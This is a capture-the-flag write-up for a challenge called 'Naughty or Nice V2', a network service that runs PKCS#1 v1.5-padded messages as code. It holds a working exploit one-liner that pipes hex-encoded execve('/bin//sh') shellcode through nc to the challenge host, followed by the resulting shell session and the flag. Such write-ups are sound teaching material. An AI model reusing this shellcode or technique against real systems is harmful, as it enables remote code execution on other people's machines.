day 7 - Naughty or Nice V2
day 7 - Naughty or Nice V2
Last year, Santa made a network service to receive instructions for Christmas wishes. Unfortunately it had some security issues, which have now been fixed. Hopefully... settings
- Service:
nc 3.93.128.89 1207 - Download: naughty_or_nice_v2.tar.gz
Recon
ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter for GNU/Linux 3.2.0, not stripped
fancy_puts(" It should be fine as long as we use a secure padding scheme like PKCS#1 1.5,right?\"\n");:
Solution
A valid PKCS#1 v1.5 padded message looks like:
00 02 | PS | M
Where PS is random, non-zero padding of length ≥8 and M is the embedded message. Simply bruteforcing ciphertexts until we find a message which decrypts to a valid message should require ~2**16 attempts.
If a valid message is received, the program will mark the page it's in executable and jump to M.
Exploiting the fact that the plaintext buffer is adjacent to the plaintext one, both being 128 bytes we should be able to use a 2 byte short jmp opcode to jump backwards to the ciphertext buffer containg our shellcode embedded in a valid PKCS#1 ciphertext.
This increases the search space (8 bits for the jump opcode eb, ~2 for a valid offset byte), but is still well within reach.
Exploit
(echo -n 00000000000000009090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090904831ff4831f64831d24831c05048bb2f62696e2f2f7368534889e7b03b0f0501003440c7 | xxd -r -p; cat -)| nc 3.93.128.89 1207
After last year's embarrassment, Santa decided to simplify how he authenticated letters.
"What's the point of hashing the message first, if the message is short?
We can just encrypt the message itself with the private key!
It should be fine as long as we use a secure padding scheme like PKCS#1 1.5, right?"
So, what would you like for Christmas?
Nice!
id
uid=999(ctf) gid=999(ctf) groups=999(ctf)
cat flag
AOTW{Nev3r_Ev3r_r0ll_ur_0wn_crypt0}
Flag
AOTW{Nev3r_Ev3r_r0ll_ur_0wn_crypt0}